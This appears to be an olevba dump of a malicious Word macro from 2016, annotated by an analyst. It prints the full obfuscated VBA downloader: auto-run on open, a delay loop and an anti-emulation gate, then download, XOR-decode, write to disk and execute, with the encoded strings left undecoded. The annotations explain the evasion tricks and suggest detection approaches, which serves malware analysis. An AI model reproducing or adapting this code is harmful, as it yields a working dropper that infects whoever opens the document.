dynamoo

Malicious Word macro

Jan 29th, 2016
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS-HB-V vbaproject.bin
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vbaproject.bin
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vbaproject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Analyst notes -- type and API declarations.
  ' K6nSWfYTCJ has the layout of a GUID (Long, Integer, Integer, 8 bytes); it is the
  ' structure that CLSIDFromString / CLSIDFromProgID below fill in.
  15. Private Type K6nSWfYTCJ
  16.   ETOOEcUg59j As Long
  17.   HhjG8qlzfRpsnobBF As Integer
  18.   MUF5U7fJz As Integer
  19.   G8Q0vHJIdAb91I(7) As Byte
  20. End Type
  ' {00000000-0000-0000-C000-000000000046} is IID_IUnknown; it is parsed at run time
  ' by CLSIDFromString instead of being written as a structure literal.
  21. Const VTGFhpz7FtVD As String = "{00000000-0000-0000-C000-000000000046}"
  ' Shape of MULTI_QI (pIID, pItf, hr): the first member receives VarPtr of the IID
  ' and the IUnknown member is read back as the created object.
  22. Private Type NdM1mpKmqpF
  23.   HK8KPt1wnHrS As Long
  24.   JITUN As IUnknown
  25.   PqxBjecC7mI As Long
  26. End Type
  ' Shape of COSERVERINFO; it is passed to CoCreateInstanceEx with no member set,
  ' which amounts to a local (same-machine) create.
  27. Private Type SyROO3UWtSacSa
  28.   XnTmqqh As Long
  29.   Ai9rugFwqT4H43zjH As Long
  30.   NTAGj As String
  31.   H7LBpJk0XA As Long
  32. End Type
  ' Raw ole32 imports (PtrSafe and legacy branches) reproduce CreateObject without the
  ' CreateObject/GetObject keywords; olevba only flags the generic "Lib" keyword here.
  ' Pointers are declared As Long in both branches, so on 64-bit Office they would be
  ' truncated -- the sample appears to assume 32-bit Office.
  33. #If VBA7 Then
  34. Private Declare PtrSafe Function CoCreateInstanceEx Lib "ole32" (RDKzbu95tmi As K6nSWfYTCJ, ByVal SfmbYfniannm4s As Long, ByVal XUoz1Syc2RL As Long, PHZ6Q7NJb9 As SyROO3UWtSacSa, ByVal Yo1VAUevWQXQ3Rx9 As Long, XZpi9rugFwq As NdM1mpKmqpF) As Long
  35. Private Declare PtrSafe Function CLSIDFromProgID Lib "ole32" (ByVal M7FCWQq60fKbE As Long, Rvk1sUXlk As K6nSWfYTCJ) As Long
  36. Private Declare PtrSafe Function CLSIDFromString Lib "ole32" (ByVal VpGhFxvC As Long, PBiRBJf As K6nSWfYTCJ) As Long
  37. #Else
  38. Private Declare Function CLSIDFromString Lib "ole32" (ByVal UyDGN6 As Long, AYHEgLU27r8 As K6nSWfYTCJ) As Long
  39. Private Declare Function CLSIDFromProgID Lib "ole32" (ByVal Lk0XAUi0 As Long, DbVPe As K6nSWfYTCJ) As Long
  40. Private Declare Function CoCreateInstanceEx Lib "ole32" (PgGec2k6Kp0s As K6nSWfYTCJ, ByVal KMcNTG5kHdZheA As Long, ByVal WBdlv2f As Long, T8AWG9okSELXY As SyROO3UWtSacSa, ByVal RvgKcDV25jAf As Long, PKf91CWRm As NdM1mpKmqpF) As Long
  41. #End If
  ' Module-level state. OH0M is assigned a random number string in Document_Open and
  ' spliced into the drop path in Vg0DiIzgDxA. The JImjWUnbapFXE* arrays are never
  ' referenced anywhere in the visible code -- filler declarations.
  42. Private OH0M As String
  43. Dim W4epF2liCnvk As String, JImjWUnbapFXE As Integer
  44. Dim JImjWUnbapFXE1() As Variant, JImjWUnbapFXE2() As Variant, JImjWUnbapFXE3() As Variant, JImjWUnbapFXE4() As Variant, JImjWUnbapFXE5() As Variant, JImjWUnbapFXE6() As Variant, JImjWUnbapFXE7() As Variant, JImjWUnbapFXE8() As Variant, JImjWUnbapFXE9() As Variant, JImjWUnbapFXE10() As Variant
  45. Dim JImjWUnbapFXE11() As Variant, JImjWUnbapFXE12() As Variant, JImjWUnbapFXE13() As Variant, JImjWUnbapFXE14() As Variant, JImjWUnbapFXE15() As Variant, JImjWUnbapFXE16() As Variant, JImjWUnbapFXE17() As Variant, JImjWUnbapFXE18() As Variant, JImjWUnbapFXE19() As Variant, JImjWUnbapFXE20() As Variant
  46. Dim JImjWUnbapFXE21() As Variant, JImjWUnbapFXE22() As Variant, JImjWUnbapFXE23() As Variant, JImjWUnbapFXE24() As Variant, JImjWUnbapFXE25() As Variant, JImjWUnbapFXE26() As Variant, JImjWUnbapFXE27() As Variant, JImjWUnbapFXE28() As Variant, JImjWUnbapFXE29() As Variant, JImjWUnbapFXE30() As Variant, JImjWUnbapFXE31() As Variant, JImjWUnbapFXE32() As Variant, JImjWUnbapFXE33() As Variant, JImjWUnbapFXE34() As Variant, JImjWUnbapFXE35() As Variant, JImjWUnbapFXE36() As Variant, JImjWUnbapFXE37() As Variant, JImjWUnbapFXE38() As Variant
  ' Analyst notes: returns a random integer in [99, 9998] as a String. Vg0DiIzgDxA
  ' appends it to the request target, and Document_Open stores another value in OH0M
  ' for the drop file name.
  ' The "name = 12 + "1"" statements found in every procedure are dead code: the names
  ' are never read (no Option Explicit is visible, so they auto-declare as Variants).
  ' Arithmetic runs such as (2500 + 119 + 2500 - 119 ...) collapse to constants
  ' (9999 and 99 here) -- opaque constants to defeat literal matching.
  47. Function DTpA9fMZ2v() As String
  48. OdZH6Tn3dSUI = 12 + "1"
  49. Dim PJXRSt12hAfr As Long
  50. EX74nuarzwX0o = 32 + "87"
  51. AIfaz64P1sE:
  52. WjwN7I = 39 + "74"
  53. Randomize
  54. YvRYF79sj = 37 + "53"
  ' Int(9999 * Rnd) gives 0..9998.
  55. PJXRSt12hAfr = Int((2500 + 119 + 2500 - 119 + 2500 + 119 + 2500 - 119 - 1) * Rnd)
  56. U8vjtAoK3omal = 36 + "56"
  ' Retry while below 99 (a GoTo loop rather than Do/Loop).
  57. If PJXRSt12hAfr < (25 + 616 + 25 - 616 + 25 + 616 + 25 - 616 - 1) Then GoTo AIfaz64P1sE
  58. Y4SV1y5K = 84 + "71"
  59. DTpA9fMZ2v = PJXRSt12hAfr
  60. GUQhHESPDlfw2Dik = 44 + "92"
  61. End Function
  ' Analyst notes: the live download -> decode -> write -> execute chain. Every literal
  ' is a hex string (YD0sRL05aK) run through the keyed decoder (NGh52oil6), so the
  ' ProgIDs, the environment-variable name, the request target and the file name are
  ' not recoverable statically. Detection should key on the API/member pattern below,
  ' not on strings.
  62. Sub Vg0DiIzgDxA()
  63. B0QeiiufSU = 10 + "80"
  64. Dim QQNuYU2Zlz1U As String, Bhkve9C81y9l As Object, FPODmkbfj9lL As Object
  65. BMLiyu5c = 9 + "36"
  ' Drop path = Environ(<decoded name>) & <decoded> & OH0M (random number) & <decoded>.
  66. QQNuYU2Zlz1U = Environ(NGh52oil6(YD0sRL05aK("F4BBC8D2D8EE14"), "S2TJblsfEeFIG4jw")) & NGh52oil6(YD0sRL05aK("C9CBF3BDC5BB7331553A095530162E"), "MmVtHw8zjF") & OH0M & NGh52oil6(YD0sRL05aK("94DBD7FD"), "Ej8dvvgPAEc")
  67. Jx9miqJGRIH = 19 + "51"
  ' Object created through the ole32 helper from a decoded ProgID. The
  ' .Open(method, target, 0) / .SEnD / .Status / .resPONSEBODy usage is consistent with
  ' an XMLHTTP-style client (unconfirmed without the decoded ProgID). Mixed-case member
  ' names are irrelevant to VBA but defeat case-sensitive greps.
  68. Set Bhkve9C81y9l = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("84C0F8C71D3C0D374A51182216732C1124"), "JdV6v"))
  69. UF1foE3p1Ghu = 42 + "9"
  ' Third argument 0 = synchronous; the random number from DTpA9fMZ2v is appended to the target.
  70. Bhkve9C81y9l.Open NGh52oil6(YD0sRL05aK("8C89CD"), "HbtYl5IU6f346"), NGh52oil6(YD0sRL05aK("F2CAEFC0A0BE6F7C5D495D7050625A7B74574D4A6A773A31065915241F63"), "RhnjOMFClneOdAeB") & DTpA9fMZ2v, 0
  71. Qqwa0pezUa = 46 + "77"
  72. Bhkve9C81y9l.SEnD
  ' (50 + 252 + 50 - 252 ...) = 200: anything other than status 200 exits silently.
  73. If Bhkve9C81y9l.Status = (50 + 252 + 50 - 252 + 50 + 252 + 50 - 252) Then GoTo Qhyoa
  74. OQl8VsVOF = 44 + "12"
  75. Exit Sub
  76. WcALqwx0acTSQ = 86 + "55"
  77. Qhyoa:
  78. XMCvW736Mek5pCa = 49 + "74"
  ' The response body is StrConv'd with 16 * 4 = 64 (vbUnicode) and passed through the
  ' same keyed decoder with a second decoded key before being written: the payload is
  ' encoded in transit, so what a network sensor captures is not the file that is dropped.
  79. GSfLoW0xSKEex QQNuYU2Zlz1U, NGh52oil6(StrConv(Bhkve9C81y9l.resPONSEBODy, (16 + 160 + 16 - 160 + 16 + 160 + 16 - 160)), NGh52oil6(YD0sRL05aK("A9AFEF998884"), "S3fHEWs27m"))
  80. FKiWdJ6VvcA2 = 67 + "47"
  ' Second object from another decoded ProgID; .eXeC of the quoted drop path launches
  ' whatever was written (consistent with a WScript.Shell-style object, unconfirmed).
  81. Set FPODmkbfj9lL = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEE7EEC6E2E4395B1007092534"), "BTHCktKrKff"))
  82. MAR6Q70cJOeU = 93 + "28"
  83. FPODmkbfj9lL.eXeC """" & QQNuYU2Zlz1U & """"
  84. LHcLiuF = 79 + "67"
  85. Set Bhkve9C81y9l = Nothing
  86. End Sub
  ' Analyst notes: the string and payload decoder -- a custom keyed XOR, not a standard
  ' cipher, so generic decoder signatures will not match it. Input and key become byte
  ' arrays (32 * 4 = 128, vbFromUnicode); a 286-entry table is built from the identity
  ' bytes, their XOR with 256, and twelve key-derived entries at both ends; each input
  ' byte is then XORed with a table entry and a key byte (FCWXoQwGqoI2gsq is XOR), with
  ' the table index wrapping past 285 and the key index wrapping at the key length.
  ' The result is converted back with 32 + 32 = 64 (vbUnicode).
  ' On Error Resume Next hides any index or conversion fault, so a wrong key yields
  ' garbage rather than an error.
  87. Function NGh52oil6(ByVal GA5N56mzJIETaw As String, MJCIRg As String) As String
  88. JRi6mghhJeD = 55 + "92"
  89. On Error Resume Next
  90. QJM2eJP6YM = 74 + "62"
  91. Dim TtG2N() As Byte, XSKEexRnULKVWy(0 To 285) As Integer, UL3zdJc5GwhYx() As Byte, OLprI, Kj2MuBYW03KPx, HVhU1xMTZP9, IbY9Gm0yb15RKib, Sf1unpciXO As Boolean, I4GS0hdSZfSW0jT As Long
  92. DdUU = 69 + "32"
  93. TtG2N = StrConv(GA5N56mzJIETaw, (32 + 679 + 32 - 679 + 32 + 679 + 32 - 679))
  94. MscKtjWPOEW = 61 + "58"
  95. UL3zdJc5GwhYx() = StrConv(MJCIRg, (32 + 907 + 32 - 907 + 32 + 907 + 32 - 907))
  96. RDoGEkeb = 72 + "23"
  97. Kj2MuBYW03KPx = UBound(UL3zdJc5GwhYx)
  98. Pd5eabFh = 88 + "81"
  ' Table entries 0..255 = identity.
  99. For OLprI = 0 To (64 + 700 + 64 - 700 + 64 + 700 + 64 - 700 - 1)
  100. XSKEexRnULKVWy(OLprI) = OLprI
  101. Next OLprI
  ' Table entries 256..285 = i XOR 256.
  102. For OLprI = (64 + 790 + 64 - 790 + 64 + 790 + 64 - 790) To (71.5 + 658 + 71.5 - 658 + 71.5 + 658 + 71.5 - 658 - 1)
  103. XSKEexRnULKVWy(OLprI) = FCWXoQwGqoI2gsq(OLprI, (64 + 406 + 64 - 406 + 64 + 406 + 64 - 406))
  104. Next OLprI
  ' Six iterations overwrite entries 250..255 and 0..5 from the key bytes.
  105. For OLprI = 1 To (1.5 + 666 + 1.5 - 666 + 1.5 + 666 + 1.5 - 666)
  106. XSKEexRnULKVWy(OLprI + (62.5 + 337 + 62.5 - 337 + 62.5 + 337 + 62.5 - 337 - 1)) = UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI)
  107. XSKEexRnULKVWy(OLprI - 1) = FCWXoQwGqoI2gsq(UL3zdJc5GwhYx(OLprI - 1), (16 + 256 + 16 - 256 + 16 + 256 + 16 - 256 - 1) * (1 + 320 + 1 - 320 + 1 + 320 + 1 - 320) + (1 + 896 + 1 - 896 + 1 + 896 + 1 - 896 - 1) - UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI))
  108. Next OLprI
  109. Sf1unpciXO = False
  110. HVhU1xMTZP9 = 0
  111. IbY9Gm0yb15RKib = 0
  ' Main pass: table index and key index advance together; the table index resets to 0
  ' the first time it passes 285 and to 5 the next time, alternating via the Boolean.
  112. For OLprI = 0 To UBound(TtG2N)
  113. If HVhU1xMTZP9 > Kj2MuBYW03KPx Then HVhU1xMTZP9 = 0
  114. If IbY9Gm0yb15RKib > (71.5 + 619 + 71.5 - 619 + 71.5 + 619 + 71.5 - 619 - 1) And Sf1unpciXO = False Then IbY9Gm0yb15RKib = 0: Sf1unpciXO = Not (Sf1unpciXO)
  115. If IbY9Gm0yb15RKib > (71.5 + 854 + 71.5 - 854 + 71.5 + 854 + 71.5 - 854 - 1) And Sf1unpciXO = True Then IbY9Gm0yb15RKib = (1.5 + 235 + 1.5 - 235 + 1.5 + 235 + 1.5 - 235 - 1): Sf1unpciXO = Not (Sf1unpciXO)
  116. I4GS0hdSZfSW0jT = FCWXoQwGqoI2gsq(TtG2N(OLprI), XSKEexRnULKVWy(IbY9Gm0yb15RKib))
  117. TtG2N(OLprI) = FCWXoQwGqoI2gsq(I4GS0hdSZfSW0jT, UL3zdJc5GwhYx(HVhU1xMTZP9))
  118. HVhU1xMTZP9 = HVhU1xMTZP9 + 1
  119. IbY9Gm0yb15RKib = IbY9Gm0yb15RKib + 1
  120. Next OLprI
  121. EzFqMf2JEX = 24 + "35"
  122. NGh52oil6 = StrConv(TtG2N(), (8 + 630 + 8 - 630 + 8 + 630 + 8 - 630) + (8 + 327 + 8 - 327 + 8 + 327 + 8 - 327))
  123. V8vVy8c = 44 + "53"
  124. End Function
  ' Analyst notes: CreateObject without the keyword. Resolves IID_IUnknown from the
  ' string constant, maps the (decoded) ProgID to a CLSID, then calls CoCreateInstanceEx
  ' with context 21 (= CLSCTX_INPROC_SERVER Or CLSCTX_LOCAL_SERVER Or CLSCTX_REMOTE_SERVER,
  ' i.e. CLSCTX_SERVER) and a single MULTI_QI, returning its IUnknown.
  ' A failed CLSIDFromProgID returns Nothing. The CoCreateInstanceEx HRESULT is never
  ' checked, so a failed create also returns Nothing and surfaces later in the caller.
  ' Detection: a VBA-declared import of ole32!CLSIDFromProgID / CoCreateInstanceEx from
  ' WINWORD is unusual in legitimate documents and survives string obfuscation.
  125. Function HS5RGT77EhJD9(ByVal YgXIV4mbjX As String) As IUnknown
  126. VFSW = 29 + "97"
  127. Dim VY35qfuHGIJnNWf As K6nSWfYTCJ, JrNlWUn8fgH9 As K6nSWfYTCJ, J36506Vmo As Long, Gu6IFZ1v As SyROO3UWtSacSa, G0dqKDSDuamdZ As NdM1mpKmqpF
  128. Ex9Mufxr = 68 + "34"
  129. CLSIDFromString StrPtr(VTGFhpz7FtVD), JrNlWUn8fgH9
  130. SwP80p = 30 + "75"
  ' MULTI_QI.pIID = address of the IID just parsed.
  131. G0dqKDSDuamdZ.HK8KPt1wnHrS = VarPtr(JrNlWUn8fgH9)
  132. Xcb = 42 + "47"
  133. J36506Vmo = CLSIDFromProgID(StrPtr(YgXIV4mbjX), VY35qfuHGIJnNWf)
  134. AmyEXN = 56 + "30"
  135. If J36506Vmo <> 0 Then Exit Function
  136. NcwUlf6m = 77 + "70"
  ' Gu6IFZ1v (COSERVERINFO shape) is passed with no member set.
  137. CoCreateInstanceEx VY35qfuHGIJnNWf, 0, 21, Gu6IFZ1v, 1, G0dqKDSDuamdZ
  138. BkzbxnGoPVt16A0cr = 10 + "80"
  139. Set HS5RGT77EhJD9 = G0dqKDSDuamdZ.JITUN
  140. Fi2vNcINQoSl8IO = 40 + "16"
  141. End Function
  ' Analyst notes: AutoExec entry point (olevba: Document_Open). On Error Resume Next
  ' suppresses every failure for the rest of the run, including errors raised inside
  ' the called procedures.
  ' The 92,378,621-iteration counting loop does nothing but burn time -- most likely a
  ' delay against sandbox time limits; the comparison after it is always true.
  ' HnbvNeARy is built and never used, and (13.5 + 874 ...) = 53 on both sides of the
  ' next If, so that predicate is always true as well. The only live path is:
  '   OH0M = random number string; If zKK(56) Then Vg0DiIzgDxA (download/execute)
  '   Else Mze1TQqABB13R (decoy). Every other Else branch also goes to the decoy.
  142. Sub Document_Open()
  143. VT8UOUgsRwp = 92 + "14"
  144. On Error Resume Next
  145. UxXwF = 73 + "97"
  146. Dim QrqheSTtixuDC7dV9 As Long, KfEMUDskqqcvM As Long, XS5SDGNPiDrGvSh As Long
  147. CGo5 = 67 + "95"
  148. QrqheSTtixuDC7dV9 = 92378621: KfEMUDskqqcvM = 0: XS5SDGNPiDrGvSh = 0
  149. UbRDiiO1JR = 19 + "16"
  ' Busy loop; no observable effect other than elapsed time.
  150. For KfEMUDskqqcvM = 1 To QrqheSTtixuDC7dV9
  151. XS5SDGNPiDrGvSh = XS5SDGNPiDrGvSh + 1
  152. Next KfEMUDskqqcvM
  153. LWEH6Qx2EwORo9 = 75 + "3"
  154. If XS5SDGNPiDrGvSh = QrqheSTtixuDC7dV9 Then
  155. NtHyo8aEUBc = 71 + "93"
  156. Dim L8eK2L608u2Q As Integer, HnbvNeARy As String
  157. For L8eK2L608u2Q = 6 To 511
  158. HnbvNeARy = HnbvNeARy + L8eK2L608u2Q
  159. Next
  160. AsrO2I7HYgu = 80 + "92"
  ' 53 = 53: opaque always-true predicate.
  161. If (13.5 + 874 + 13.5 - 874 + 13.5 + 874 + 13.5 - 874 - 1) = (13.5 + 135 + 13.5 - 135 + 13.5 + 135 + 13.5 - 135 - 1) Then
  162. AJcvBp = 4 + "31"
  163. OH0M = DTpA9fMZ2v
  164. KZ9mSgQ0rgT2Uw = 8 + "52"
  ' zKK is the anti-emulation gate; the download chain runs only when it returns True.
  165. If zKK(56) = True Then
  166. AdSLYPqnY7dQB = 16 + "29"
  167. Vg0DiIzgDxA
  168. ELl1nzDlSZ1y = 79 + "15"
  169. Else
  170. GLXGfQ7NxKnYj19U = 39 + "70"
  171. Mze1TQqABB13R
  172. XCzEv3EbmKe = 42 + "60"
  173. End If
  174. Else
  175. YlSe09O7zL = 67 + "64"
  176. Mze1TQqABB13R
  177. DMAKmdxzzr0 = 10 + "19"
  178. End If
  179. Mne6wJBeADKYmM2 = 70 + "37"
  180. Else
  181. T0FFypb0vGRCDg = 98 + "10"
  182. Mze1TQqABB13R
  183. G3qne510I = 9 + "6"
  184. End If
  185. XMW4XDjRhDv = 21 + "22"
  186. End Sub
  ' Analyst notes: character count of a string passed as a Variant. Assigning the
  ' string to a Byte array yields its UTF-16 bytes, so (UBound + 1) / 2 is the number
  ' of characters. Used as the loop bound by the hex decoder YD0sRL05aK.
  187. Function YX0A(ByVal MQtzLoXuOYbLqu As Variant) As Long
  188. OuFnguCHQCvkiEP = 1 + "39"
  189. Dim QwpqyS1CCmGIHl() As Byte, TSkgb6tQQP As Long
  190. QwpqyS1CCmGIHl = MQtzLoXuOYbLqu
  191. TSkgb6tQQP = UBound(QwpqyS1CCmGIHl)
  192. OYeqxyYkF0vmrK = 61 + "10"
  193. YX0A = (TSkgb6tQQP + 1) / 2
  194. GYQeYWE = 55 + "7"
  195. End Function
  ' Analyst notes: XOR written as (a And Not b) Or (Not a And b) so the Xor keyword never
  ' appears in the source; parameters and return are untyped Variants. This is the
  ' primitive the decoder NGh52oil6 is built on.
  196. Private Function FCWXoQwGqoI2gsq(RPDg57P7hlEFgul, ADcW8E85E1Pax)
  197. FCWXoQwGqoI2gsq = (RPDg57P7hlEFgul And Not ADcW8E85E1Pax) Or (Not RPDg57P7hlEFgul And ADcW8E85E1Pax)
  198. End Function
  ' Analyst notes: writes the decoded payload (B6V96KLhYx) to the drop path (VvtBc6OjlU).
  ' The object comes from a decoded ProgID through the ole32 helper; the
  ' .CrEatEtextFILe / .WrItE / .Close sequence is the FileSystemObject TextStream pattern.
  ' The mixed case is cosmetic -- VBA is case-insensitive, and olevba still matched
  ' CreateTextFile and Write in its keyword table.
  199. Sub GSfLoW0xSKEex(VvtBc6OjlU As String, B6V96KLhYx As String)
  200. Dim GV0xeDx0mp3 As Object
  201. IJrWlrmJ6zEyhI8rS = 47 + "89"
  202. Set GV0xeDx0mp3 = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEEEE5AFE7FD3703194F750A120A3E213A27322C1A2F16041354"), "WYBERAXjvh9hrbc"))
  203. IpK6h9F6mCyBp = 36 + "75"
  204. With GV0xeDx0mp3.CrEatEtextFILe(VvtBc6OjlU)
  205. CXAZvr3a3HQHRio = 91 + "90"
  206. .WrItE (B6V96KLhYx)
  207. PBuOt0qn2gZW = 42 + "91"
  208. .Close
  209. PTUNv57 = 85 + "16"
  210. End With
  211. IiJHZnqkHbh = 92 + "76"
  212. Set GV0xeDx0mp3 = Nothing
  213. N1Rzcq2EbVxloSUDZ = 28 + "44"
  214. End Sub
  ' Analyst notes: decoy procedure, reached only from the Else branches in Document_Open.
  ' Its calls are meaningless (ChDir 17, Sin 39, Day(27), ...) and several would raise at
  ' run time (App is not a Word VBA object; GfvNc is undeclared) -- errors the caller's
  ' On Error Resume Next swallows. The CallByName hit in the olevba table comes from
  ' here, not from the live download path.
  215. Sub Mze1TQqABB13R()
  216. XCISdGMlkVj = 87 + "37"
  217. DoEvents
  218. ChDir 17
  219. Weekday 66
  220. C3T0ybW1xUCCzcT = EOF(17)
  221. Sin 39
  222. Rnd
  223. WvrdmO99Bp36Dt = Day(27)
  224. App.StartLogging "TiCejbAsO", 62
  225. AvzmJBeh7hYw = DateValue(56)
  226. CallByName GfvNc, 1, VbMethod, 42, 89, 74
  227. EEWiNLRPCNEchhE = 37 + "48"
  228. End Sub
  ' Analyst notes: hex-to-string decoder. Chr$(38) & Chr$(72) spells "&H", so the hex
  ' prefix never appears literally in the source (olevba reports it on the last row of
  ' its table). Each pair of hex digits becomes one Chr$; the result is the ciphertext
  ' handed to NGh52oil6 together with a key.
  229. Function YD0sRL05aK(V3fzXeOUBPx2S8XV As String) As String
  230. Qe6K16Ywzx = 27 + "58"
  231. Dim Ps3eMvayS2uM As Integer
  232. JkCld06th = 16 + "51"
  ' YX0A returns the character count; Step 2 walks the string in hex pairs.
  233. For Ps3eMvayS2uM = 1 To YX0A(V3fzXeOUBPx2S8XV) Step 2
  234. YD0sRL05aK = YD0sRL05aK & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(V3fzXeOUBPx2S8XV, Ps3eMvayS2uM, 2)))
  235. Next
  236. RmzBqzO5y = 81 + "13"
  237. End Function
  ' Analyst notes: anti-emulation gate; the argument is unused. KJPXc is Static. On the
  ' first call the function executes Debug.Assert Not zKK(93): the nested call bumps the
  ' counter to 2, returns False (2 <> 0) and resets the counter to 0, so the outer call
  ' then returns True and Document_Open takes the download branch.
  ' If an analysis engine does not evaluate the Debug.Assert argument, the counter stays
  ' at 1, zKK returns False and only the decoy runs. Sandboxes and emulators therefore
  ' need to evaluate Debug.Assert expressions to observe the real behaviour.
  238. Function zKK(LUKdO7lrt As Integer) As Boolean
  239. Oba3cMG = 38 + "16"
  240. Static KJPXc As Byte
  241. DyHz6lC = 57 + "65"
  242. KJPXc = KJPXc + 1
  243. WUO9NHeGmcc1l7 = 63 + "74"
  244. If KJPXc = 1 Then Debug.Assert Not zKK(93)
  245. CkSCXIFqJrIuf = 39 + "7"
  246. zKK = KJPXc = 0
  247. Iak1tN3MMkVX = 72 + "12"
  248. KJPXc = 0
  249. R3eNqpCWdmoXNS = 30 + "40"
  250. End Function
  251.  
  252. +------------+----------------------+-----------------------------------------+
  253. | Type       | Keyword              | Description                             |
  254. +------------+----------------------+-----------------------------------------+
  255. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  256. | Suspicious | Open                 | May open a file                         |
  257. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  258. |            |                      | function calls                          |
  259. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  260. |            |                      | strings                                 |
  261. | Suspicious | CreateTextFile       | May create a text file                  |
  262. | Suspicious | Environ              | May read system environment variables   |
  263. | Suspicious | Write                | May write to a file (if combined with   |
  264. |            |                      | Open)                                   |
  265. | Suspicious | Lib                  | May run code from a DLL                 |
  266. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  267. |            |                      | be used to obfuscate strings (option    |
  268. |            |                      | --decode to see all)                    |
  269. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  270. |            |                      | may be used to obfuscate strings        |
  271. |            |                      | (option --decode to see all)            |
  272. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  273. |            | Strings              | may be used to obfuscate strings        |
  274. |            |                      | (option --decode to see all)            |
  275. | VBA string | &H                   | Chr$(38) & Chr$(72)                     |
  276. +------------+----------------------+-----------------------------------------+